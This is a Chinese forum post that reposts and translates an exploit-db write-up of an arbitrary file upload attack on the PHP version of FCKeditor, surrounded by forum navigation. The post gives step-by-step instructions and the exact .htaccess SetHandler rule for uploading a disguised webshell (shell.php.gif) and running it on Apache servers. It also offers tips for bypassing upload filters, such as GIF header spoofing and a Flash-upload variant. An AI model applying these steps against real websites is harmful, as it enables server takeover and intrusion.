首页
Portal
业界资讯
社区
BBS
我的家园
Space
个人空间
导读
Guide
登录
/
注册
用户名
Email
自动登录
找回密码
密码
登录
注册
搜索
搜索
本版
帖子
用户
本版
帖子
用户
帖子
好友
道具
勋章
收藏
任务
淘帖
门户
导读
设置
我的收藏
退出
腾讯QQ
微信登录
首页
›
≡≡网络技术≡≡
›
网络技术
›
Fckeditor PHP版本爆出新漏洞了~
返回列表
黑客安全
Fckeditor PHP版本爆出新漏洞了~
[ 复制链接 ]
灰儿
2014-6-4 11:48:35
【转】Fckeditor PHP版本爆出新漏洞了~
In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] Date: 2011[+] script:
http://sourceforge.net/projects/fckeditor/
[+] Author : pentesters.ir[+] Website :
WwW.PenTesters.IR--------------- ... -----------1.create
a htaccess file:code: <FilesMatch "_php.gif">SetHandler application/x-httpd-php</FilesMatch> 2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html[url]http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html----------------------------------------------------------------------------------------------3.Now
[/url] upload shell.php.gif with FCKeditor.4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.5.
6.Now shell is available from server. ---------------------------------------------------------
http://www.exploit-db.com/exploits/17644/
这个是exploit-db上的原文,我就是个翻译一下
1.首先在本地创建一个.htaccess(注意前面有个点),内容为:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php </FilesMatch>
2.然后用fckeditor把这个文件上传上去(至于FCKEDITOR如何上传这里不再赘述)
3.创建一个webshell,比如phpspy什么的,然后把后缀名改成shell.php.gif,上传上去。(可以用GIF文件头欺骗,不过有的过滤很严,可能上不上去,最后我会说一种方法,上传成功率高些)
4.文件名会变成shell_php.gif,访问这个文件,就会发现,你已经得到webshell
写在最后:
这个漏洞的还是很有局限性的,只适用于PHP的fck,而且还必须是apache之类的服务器,IIS什么的都不行。
还有就是有些人可能会遇到在上传图片的时候,fckeditor报错,说是错误的文件什么的,这里有个方法:
可以换种上传类型,用Flash上传就不会碰到类似的限制,不过.htaccess文件的内容也要改改,还有shell的文件名
<FilesMatch "_php.flv">
SetHandler application/x-httpd-php </FilesMatch>
shell的名字改成shell.php.flv 这样就可以了
相关帖子
Wrong permissions on configuration file, should not be world writable!
Wrong permissions on configuration file, should not be world writable
备份MySQL出现Can’t open file when using LOCK TABLES错误
Fatal error: Incompatible file format: The encoded file has format major ID
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
回复
本版积分规则
回帖后跳转到最后一页
灰儿
管理员
9832篇
主题总数
7
总热度
提问
+关注
产品动态
2024-05-04
Switch EdiZon SE 金手指插件使用 图文教程
2024-04-29
网御星云入侵防护系统_V6000流量控制配置实例
2024-04-23
电子书在线阅读和下载网址推荐
2024-04-23
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
2024-04-23
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
2024-04-20
《再次成为神》免费下载观看
2024-04-20
《為甚麼會有人類》
2024-04-16
Linux下查询文件夹中文件数量的方法
热点推荐
1
Switch EdiZon SE 金手指插件使用 图文教程
2
网御星云入侵防护系统_V6000流量控制配置实例
3
电子书在线阅读和下载网址推荐
4
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
5
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
6
《再次成为神》免费下载观看
7
《為甚麼會有人類》
8
Linux下查询文件夹中文件数量的方法
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
产品动态
2024-05-04
Switch EdiZon SE 金手指插件使用 图文教程
2024-04-29
网御星云入侵防护系统_V6000流量控制配置实例
2024-04-23
电子书在线阅读和下载网址推荐
2024-04-23
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
2024-04-23
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
2024-04-20
《再次成为神》免费下载观看
2024-04-20
《為甚麼會有人類》
2024-04-16
Linux下查询文件夹中文件数量的方法
热点推荐
1
Switch EdiZon SE 金手指插件使用 图文教程
2
网御星云入侵防护系统_V6000流量控制配置实例
3
电子书在线阅读和下载网址推荐
4
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
5
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
6
《再次成为神》免费下载观看
7
《為甚麼會有人類》
8
Linux下查询文件夹中文件数量的方法
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
6.Now shell is available from server. ---------------------------------------------------------
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
